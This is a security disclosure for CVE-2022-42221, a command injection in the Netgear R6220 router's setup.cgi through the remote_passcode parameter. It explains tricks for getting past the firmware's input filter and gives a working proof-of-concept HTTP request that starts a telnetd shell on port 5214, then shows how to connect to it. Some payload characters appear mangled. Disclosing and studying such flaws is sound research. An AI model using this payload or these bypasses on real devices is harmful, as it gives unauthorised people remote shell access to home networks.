Headline

CVE-2022-42221: CVE_Report/Netgear/R6220 at main · Cj775995/CVE_Report

Netgear R6220 v1.1.0.114_1.0.1 suffers from Incorrect Access Control, resulting in a command injection vulnerability.

2 years ago

CVE

Open in Source

#vulnerability #web #ubuntu #linux #auth #telnet #firefox

Information

Vendor of the products: Netgear

Reported by: Chengjian([email protected]) & HuoXingpeng([email protected]) & ShaLetian([email protected])

Affected products: Netgear r6220 <= v1.1.0.114_1.0.1

Firmware download address: https://www.downloads.netgear.com/files/GDC/R6220/R6220-V1.1.0.114.zip

** Vulnerability Description**

The vulnerability is detected at /usr/sbin/setup.cgi

The vulnerability point is located at the following location in sub_1AF88

The v4 here receives the remote_passcode parameter, which is first filtered by the test_command_inject function. Although a lot of characters are filtered out here, we can still use & for splice injection. The /bin/sh check can also be bypassed by constructs like /$9bin/$9sh, and telnetd can also be bypassed by constructs like telne’’td.

After passing the inspection, the remote_passcode parameter is obtained directly through nvram_set, and then obtained and assigned to v7 through nvram_get, and finally passed into the COMMAND function for splicing and execution without checking.

This bypasses the check and implements command injection.

POC

After logging in to the page, command injection can be achieved by capturing packets through burpsuite and sending the following request.

POST /setup.cgi??id=7c534ca23308d480 HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 345 Origin: http://192.168.1.1 Authorization: Basic YWRtaW46QWRtaW4x Connection: close Referer: http://192.168.1.1/USB_media.htm&todo=cfg_init Cookie: sessionid=sid16174xxx73678xxx1962923992x Upgrade-Insecure-Requests: 1

media_server=&itunes_server=&config_passcode=&media_server_name=ReadyDLNA&scan=0&h_media_server=enable&h_itunes_server=enable&remote_passcode=%26telne%27%27td±l+%2F%249bin%2F%249sh±p+5214±b+0.0.0.0%26&h_scan=0&todo=iserver_allow_ctrl&this_file=USB_media.htm&next_file=USB_media.htm

Get Shell

First, port 5214 is closed, and we directly test the connection through nc.

Then use burpsuite to capture packets and modify parameters, and submit.

Connect again, and successfully connect the terminal through port 5214.